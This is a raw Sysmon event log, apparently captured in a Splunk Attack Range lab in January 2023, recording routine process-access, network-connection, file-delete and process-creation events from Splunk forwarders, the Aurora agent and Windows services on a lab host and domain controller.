12:19:34.411{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015858Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:34.411{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015857Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:34.411{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015856Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:34.411{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015855Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:34.411{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015854Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:34.411{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015853Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:34.411{E5A8D418-DC43-63C7-0500-00000000B002}416532C:\Windows\system32\csrss.exe{E5A8D418-E3D6-63C7-F401-00000000B002}1816C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000015852Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:34.411{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E3D6-63C7-F401-00000000B002}1816C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000015851Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:34.412{E5A8D418-E3D6-63C7-F401-00000000B002}1816C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000015867Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:33.020{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50067-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000015866Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:35.636{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E777D097E201F5EF17ABD1D0BD13951F,SHA256=81DE227B53FA80822282B798A122C0DC0FCCE9DB398664A7ABE61D6D46AF77B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041130Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:35.766{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3E8A6B286B7A104738F4E2733F1A0F5,SHA256=33FFA0ECF7EAD9553FEAA2BFF351A6D0C99656629CC8A50E13C63491F75EFEDE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015865Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:35.520{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3457F5005F3FABAEBDF359A48D8E5325,SHA256=44CD7756DEC8258C5399CAC50D658A2EA14967B0E3043F512CC03C3C758A08A6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000041129Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:32.932{FE4C2B44-D9F1-63C7-0100-00000000AF02}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56266-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local445microsoft-ds 354300x800000000000000041128Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:32.932{FE4C2B44-D9F1-63C7-0100-00000000AF02}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56266-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local445microsoft-ds 354300x800000000000000041127Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:32.832{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56265-false10.0.1.14win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000041126Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:32.832{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56265-false10.0.1.14win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000041125Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:32.823{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56264-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000041124Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:32.823{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56264-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local389ldap 23542300x800000000000000015868Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:36.726{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4658AF919C86FBDE6163A9C728A64E3,SHA256=976D37BD5C39166B43F6893023E5F45255CCF3B5BFAD8D4EA79C743EC61ACB35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041131Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:36.851{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E91A1A7C1C38FF79A18E0EAD1A92F9AE,SHA256=1F63E4E2E67C6D08B36D199BF4A5C192BBE7CC14CEF6C4DD81E446220D3F763A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015869Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:37.818{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F15573BB507CE0471953A80E6824C4CE,SHA256=EE5FF21DCADF8AD40C7904F39FE1DEEB1E8603450726875C541FD9747A71A716,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041133Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:37.934{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D87E1560F9D106A5E3446D4D94EA647A,SHA256=B3B79F15D255EB4CECBFCCB6BCC97916449FF4943BB6E5807B2D01586F263BC0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000041132Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.647{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56267-false10.0.1.12-8000- 23542300x800000000000000015870Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:38.906{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABF27915B3BE448BD5E6B67E1D99B7CE,SHA256=D909DEEB40CFC616849338D69289ADD9838D0D6C84C83347C79B91B98167D059,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015871Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:39.979{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96F36181FD24B14C1EBFB7839D243561,SHA256=FBC05AED674D7C6EE1640F8C21C26B09DF2323F8D684826726A9E4BCFB94FA41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041134Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:39.004{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0CC860AB437A4F330942E127CBACD8F,SHA256=6962A778C6F603A8732A7181979E17764F4165E7D8CF6F906567E4AC2BADAFCB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000015872Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:38.023{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50068-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000041135Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:40.067{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2367F16612D8D33E247CB80ABCFA0338,SHA256=065597D8230E009F8D8A4335FE7FD3A2E61A21C12D192F10FC63AB6817418BE2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015873Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:41.071{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A184F01086A7100F56A507D6133E0340,SHA256=83D9DDC9C9DA3C1C3956A8D8F8AF87F23337F5DB2FD57A044EEEF8C0FEC6D165,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041136Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:41.147{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA1518914C124DEFB19991FDABF5E900,SHA256=164C5230823BF873A49C9779FD21A8C9903888177D90E8D3A51148C3909C1320,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000015905Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.808{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015904Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.803{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015903Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.801{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015902Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.784{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015901Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.780{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015900Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.779{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015899Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.777{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001724F150) 10341000x800000000000000015898Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:42.768{E5A8D418-DC44-63C7-1C00-00000000B002}20203676C:\Program 